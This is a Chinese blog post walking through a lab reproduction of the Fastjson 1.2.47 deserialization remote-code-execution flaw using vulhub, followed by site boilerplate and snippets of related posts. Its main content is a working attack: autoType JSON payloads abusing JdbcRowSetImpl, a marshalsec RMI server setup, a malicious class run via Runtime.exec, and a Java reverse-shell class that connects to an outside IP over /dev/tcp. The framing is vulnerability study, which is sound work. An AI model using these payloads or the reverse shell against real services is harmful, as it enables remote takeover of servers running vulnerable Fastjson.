Fastjson1.2.47反序列化漏洞复现

原创 已于 2024-12-26 20:07:23 修改 · 置顶 · 973 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#fastjson #java #渗透测试

于 2020-07-10 03:01:10 首次发布
本文详细介绍如何在CentOS环境下利用FastJSON 1.2.47版本的远程代码执行(RCE)漏洞,包括搭建实验环境、配置Docker、安装Tomcat以及复现漏洞的具体步骤。

实验环境

攻击机C:Windows 10 企业版 LTSC

靶机A:CentOS8 (公网)

监听主机B:Centos7(公网)

项目地址:

https://github.com/vulhub/vulhub

该篇复现环境是fastjson1.2.47,复现手法同时适用于fastjson1.2.24,payload已在下文提供

基础环境搭建

    在靶机A上安装docker

curl https://download.docker.com/linux/centos/docker-ce.repo -o /etc/yum.repos.d/docker-ce.repoyum install https://download.docker.com/linux/fedora/30/x86_64/stable/Packages/containerd.io-1.2.6-3.3.fc30.x86_64.rpmyum install docker-cesystemctl start docker

    更换镜像源

vi /etc/docker/daemon.json

    修改文件内容,镜像源地址可以用阿里云的镜像地址,百度的镜像源会有一个包下载很慢。自己登陆阿里云获取

{        "registry-mirrors": ["https://xxxxx.mirrors.aliyun.com"]}

保存退出之后,重新加载配置,重启docker

systemctl daemon-reloadsystemctl restart docker

摘取镜像

docker pull busybox

成功打印出"hello world"说明配置成功

docker run busybox echo “hello world”

到此docker配置完成

接下来部署实验环境

实验环境搭建

项目地址

https://github.com/vulhub/vulhub

下载后上传至靶机A任意目录,进入目录

vulhub-master/fastjson/1.2.47-rce

启动docker编译

docker-compose up -d

PS

很多人pip装不上,这里的方法亲测有效;

yum install -y python38wget https://bootstrap.pypa.io/get-pip.pysudo  python3 get-pip.pypip -versionpip install docker-compose

在监听主机B上安装Tomcat,远程加载恶意类。

拉取docker镜像

docker pull rightctrl/tomcat

映射到服务器8080端口

docker run -d --name tomcat -p 8080:8080 rightctrl/tomcat
访问http://ip:8080



 
把编译好的恶意类拷贝进docker环境,具体路径进入docker查找

docker cp TouchFile.class  tomcat:/opt/tomcat/webapps/
TouchFie.class的java源码如下:

import java.lang.Runtime;import java.lang.Process;public class TouchFile {    static {        try {            Runtime rt = Runtime.getRuntime();            String[] commands = {"touch", "/tmp/success"};            Process pc = rt.exec(commands);            pc.waitFor();        } catch (Exception e) {            // do nothing        }    }}
上传成功后确认可以访问TouchFile.class


继续在监听主机B上使用marshalsec快速开启rmi或ldap服务
marshalsec项目地址

https://github.com/mbechler/marshalsec
使用maven编译jar包

mvn clean package -DskipTests
进入target目录,并开启rmi或者ladp服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://恶意类的IP:8080/#TouchFile 8088

复现步骤

攻击机C上直接访问搭好的漏洞环境

payload

//1.2.24以下版本{    "a":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://ip:8088/TouchFile",        "autoCommit":true    }}//1.2.47以下版本{"a":{        "@type":"java.lang.Class",        "val":"com.sun.rowset.JdbcRowSetImpl"    },    "b":{        "@type":"com.sun.rowset.JdbcRowSetImpl",        "dataSourceName":"rmi://ip:8088/TouchFile",        "autoCommit":true    }}

 发送请求后,rmi服务器收到响应,远程加载恶意类TouchFile.class

可以看到已经成功执行touch /tmp/success

同理可反弹shell

反弹shell文件(除了远程加载的恶意类不同,其他操作均相同)

import java.io.BufferedReader;import java.io.InputStream;import java.io.InputStreamReader;public class Exploit{    public Exploit() throws Exception {        Process p = Runtime.getRuntime().exec(new String[]{"/bin/bash","-c","exec 5<>/dev/tcp/175.24.81.132/9999;cat <&5 | while read line; do $line 2>&5 >&5; done"});        InputStream is = p.getInputStream();        BufferedReader reader = new BufferedReader(new InputStreamReader(is));        String line;        while((line = reader.readLine()) != null) {            System.out.println(line);        }        p.waitFor();        is.close();        reader.close();        p.destroy();    }    public static void main(String[] args) throws Exception {    }}

在监听主机B上同时用NC监听端口

成功拿shell

Fastjson 1.2.47反序列化漏洞复现
m0_54899775的博客
03-16 3630
Fastjson 1.2.47反序列化漏洞复现
Fastjson <= 1.2.47 反序列化漏洞复现
qq_32660043的博客
08-23 576
0x01 前言 Fastjson 是一个 Java 语言编写的高性能功能完善的 JSON 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象,在中国和美国使用较为广泛。 0x02 漏洞成因 Fastjson < 1.2.68 版本在处理反序列化对象时存在安全问题,导致攻击者可以执行 java 代码,具体分析可参考:FastJson 反序列化学习 0x03 环境准备 docker 搜索 Fastjson 漏洞利用镜像: docker search fas
Fastjson1.2.47远程代码执行
最新发布
m0_63017297的博客
09-19 168
Fastjson 1.2.47远程代码执行漏洞利用
fastjson1.2.47漏洞复现
m0_63699746的博客
07-05 1002
​在前后端数据传输交互中,经常会遇到字符串(String)与json,XML等格式相互转换与解析,其中json以跨语言,跨前后端的优点在开发中被频繁使用,基本上可以说是标准的数据交换格式。相比1.2.24,1.2.47过滤了许多恶意类的上传姿势以及关闭了autoType,例如双写等绕过,但是并不阻挡hacker的攻击脚步,发现在fastjson中有一个全局缓存,当有类进行加载时,如果autoType没开启,会尝试从缓存中获取类,如果缓存中有,则直接返回。浏览器输入ip:端口。
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
HEAVEN569的博客
06-21 1963
Fastjson 1.2.47 反序列化(CVE-2017-18349)漏洞复现
漏洞复现 Fastjson 1.2.47-rce
Lucky1youzi的博客
01-05 1179
用burp得扩展插件FastjsonScan来进行检测,将拦截得包右击鼠标发送Extensions/FastjsonScan ,如果扫描的目标存在漏洞,在窗口下面的Request窗口会展示使用的payload,如果没有漏洞,则会展示原始的请求与响应。fastjson1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。构造反弹shell,进行base64编码,推荐在线工具,可以快速做bash反弹shell命令。
fastjson_1.2.47 反序列化漏洞复现
acdcccc的博客
09-19 419
fastjson 1.2.47 反序列化漏洞复现
fastjson<=1.2.47反序列化漏洞复现
DaWan
09-29 514
fastjson<=1.2.47反序列化漏洞复现环境搭建漏洞复现 环境搭建 漏洞复现 创建一个java类: TouchFile.java // javac TouchFile.java import java.lang.Runtime; import java.lang.Process; public class TouchFile { static { try { Runtime rt = Runtime.getRuntime();
fastjson反序列化漏洞手把手复现
潇逗
07-22 1447
需要登录网址 https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html ,选择自己需要的java版本下载。ngrok使用参考https://editor.csdn.net/md/?这里第135后面跟的4444端口是开启Http映射的时候设置的端口,后面的9999端口是我们rmi服务用来监听的端口。(1)官网下载 https://maven.apache.org/download.cgi。
【网络安全】Fastjson反序列化漏洞复现
kali_Ma的博客
12-26 3010
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。
(环境搭建+复现Fastjson1.2.47版本反序列化漏洞复现
热门推荐
daxi0ng的博客
11-13 1万+
0x00 简介 fastjson 是阿里巴巴的开源JSON解析库,它可以解析 JSON 格式的字符串,支持将 Java Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化JavaBean。 0x01 漏洞概述 Fastjson1.2.47反序列化漏洞 首先,Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型...
vulhub复现fastjson1.2.47漏洞复现
m0_70483044的博客
07-14 3344
目录什么是json?fastjson有啥用?什么是fastjson?json语法规则为什么要引进AutoType?漏洞原理怎么确认存在漏洞的?漏洞复现反弹shell。
fastjson反序列化漏洞fastjson-1.2.47
zyer
04-28 4412
fastjson 1.2.47 爆出了最为严重的漏洞,可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。 一.原理 测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...
fastjson漏洞 - Fastjson1.2.47反序列化漏洞
HAKUNAMATATATTA的博客
01-06 3009
Fastjson 是阿里巴巴公司开源的一款 JSON 解析器,它可以解析 JSON 格式的字符串,Bean 序列化为 JSON 字符串,也可以从 JSON 字符串反序列化Java Bean。
fastjson 1.2.47 RCE漏洞保姆级复现
ALLEN'Blog
02-01 1476
Fastjson提供了autotype功能,允许用户在反序列化数据中通过“@type”指定反序列化的类型,Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法,那么当组件开启了autotype功能并且反序列化不可信数据时,攻击者可以构造数据,使目标应用的代码执行流程进入特定类的特定setter或者getter方法中,若指定类的指定方法中有可被恶意利用的逻辑(也就是通常所指的“Gadget”),则会造成一些严重的安全问题。并且在Fastjson
fastjson反序列化漏洞复现
weixin_58954236的博客
09-11 1651
FastJson是Alibaba的一款开源Json解析库,可用于将Java对象转换为其Json表示形式,也可以用于将Json字符串转换为等效的Java对象。近几年来FastJson漏洞层出不穷。RCE漏洞的源头:17年FastJson爆出的1.2.24反序列化漏洞。​ 关于FastJson1.2.24反序列化漏洞,简单来说,就是FastJson通过parseObject/parse将传入的字符串反序列化Java对象时由于没有进行合理检查而导致的。
Fastjson反序列化漏洞复现
weixin_52501704的博客
01-02 2424
Fastjson反序列化漏洞复现
FastJson反序列化漏洞复现
小赵同学的博客
07-29 4243
漏洞利用FastJson autotype处理Json对象的时候,未对@type字段进行完整的安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码。攻击者通过这种方式可以实现远程代码执行漏洞,获取服务器敏感信息,甚至可以利用此漏洞进一步的对服务器数据进行操作。......
fastjson反序列化漏洞复现
THZLYXX的博客
11-25 500
fastjson在解析json(反序列化)的过程中,支持使用@Type来实例化一个具体类,且自动调用这个类的set/get方法来访问属性。服务器的fastjson在处理json数据的过程中,没有对@type进行校验,攻击者就可以传入危险类,并且调用危险的类远程连接ldap/rmi服务,通过ldap/rmi服务上的恶意代码执行远程命令。6.使用JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar工具开启JNDI服务(注意需要使用jdk1.8环境)4.可使用burp进行编码。
fastjson反序列化漏洞复现过程
04-19
根据提供的引用内容,fastjson反序列化漏洞是一种安全漏洞,攻击者可以利用该漏洞在目标系统上执行恶意代码。下面是fastjson反序列化漏洞复现过程[^1][^2]: 1. 判断是否使用Fastjson以及Fastjson版本:首先需要确定目标系统是否使用了Fastjson,并且确定Fastjson的版本号。可以通过查看项目的依赖文件或者代码中的导入语句来确定。 2. 漏洞复现:根据Fastjson的版本号选择相应的漏洞复现方法。 - Fastjson<1.2.24远程代码执行(CNVD-2017-02833):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中插入恶意的Java代码,并通过反序列化操作执行该代码。 - Fastjson<=1.2.47远程代码执行漏洞(CNVD-2019-22238):该漏洞可以通过构造恶意的JSON字符串来触发远程代码执行。攻击者可以在JSON字符串中使用特殊的反射调用方式来执行恶意代码。 3. 防范措施:为了防止fastjson反序列化漏洞的利用,可以采取以下措施: - 及时升级Fastjson版本:Fastjson团队会及时修复漏洞并发布新版本,及时升级到最新版本可以避免被已知漏洞攻击。 - 输入验证和过滤:在接收用户输入并进行反序列化操作之前,对输入进行严格的验证和过滤,确保输入的数据符合预期的格式和内容。 - 使用安全的JSON库:考虑使用其他安全性更高的JSON库,如Jackson或Gson,来替代Fastjson
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值